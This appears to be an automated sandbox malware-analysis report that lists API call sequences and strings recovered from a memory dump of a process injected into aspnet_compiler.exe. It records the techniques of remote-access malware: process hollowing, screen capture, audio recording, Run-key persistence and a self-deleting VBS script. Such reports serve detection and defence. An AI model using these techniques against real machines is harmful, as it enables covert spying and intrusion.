                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                          • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                          • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                          • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                          APIs
                                                                            • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                          • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                          • String ID:
                                                                          • API String ID: 1272433827-0
                                                                          • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                          • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                          • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                          • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                          • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                          • String ID:
                                                                          • API String ID: 1084509184-0
                                                                          • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                          • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                          • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                          • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                          • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                          • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                          • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: recv
                                                                          • String ID:
                                                                          • API String ID: 1507349165-0
                                                                          • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                          • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                          • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                          • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                          • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                          • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                          • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                          • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                          • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                          APIs
                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                            • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                          • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                          • DeleteDC.GDI32(?), ref: 0041805D
                                                                          • DeleteDC.GDI32(00000000), ref: 00418060
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                          • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                          • DeleteObject.GDI32(?), ref: 004180FA
                                                                          • DeleteObject.GDI32(?), ref: 00418107
                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                          • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                          • DeleteDC.GDI32(?), ref: 0041827F
                                                                          • DeleteDC.GDI32(00000000), ref: 00418282
                                                                          • DeleteObject.GDI32(00000000), ref: 00418285
                                                                          • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                          • DeleteObject.GDI32(00000000), ref: 00418344
                                                                          • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                          • DeleteDC.GDI32(?), ref: 0041835B
                                                                          • DeleteDC.GDI32(00000000), ref: 00418366
                                                                          • DeleteDC.GDI32(?), ref: 00418398
                                                                          • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                          • DeleteObject.GDI32(?), ref: 004183A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                          • String ID: DISPLAY
                                                                          • API String ID: 1765752176-865373369
                                                                          • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                          • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                          • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                                          • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                          • ResumeThread.KERNEL32(?), ref: 00417582
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                          • GetLastError.KERNEL32 ref: 004175C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                          • API String ID: 4188446516-3035715614
                                                                          • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                          • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                          • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                          • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                          APIs
                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                          • ExitProcess.KERNEL32 ref: 0041151D
                                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                          • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                          • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                          • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                            • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                            • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                                            • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                          • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                            • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                          • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                          • API String ID: 4250697656-2665858469
                                                                          • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                          • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                          • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                          • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                          APIs
                                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                          • ExitProcess.KERNEL32 ref: 0040C287
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                          • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                          • API String ID: 3797177996-1998216422
                                                                          • Opcode ID: 177f732f6a563801dfcc3612c4b3f16abc6eb398085b1a3bfb8d3de021403fbd
                                                                          • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                          • Opcode Fuzzy Hash: 177f732f6a563801dfcc3612c4b3f16abc6eb398085b1a3bfb8d3de021403fbd
                                                                          • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                          APIs
                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                          • SetEvent.KERNEL32 ref: 0041A38A
                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                          • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                          • API String ID: 738084811-1408154895
                                                                          • Opcode ID: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                          • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                          • Opcode Fuzzy Hash: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                          • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                          • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                          • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                          • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Write$Create
                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                          • API String ID: 1602526932-4212202414
                                                                          • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                          • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                          • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                          • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                          • API String ID: 1646373207-3272542945
                                                                          • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                          • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                          • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                          • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 0040BC75
                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                          • _wcslen.LIBCMT ref: 0040BD54
                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000), ref: 0040BDF2
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                          • _wcslen.LIBCMT ref: 0040BE34
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                          • ExitProcess.KERNEL32 ref: 0040BED0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
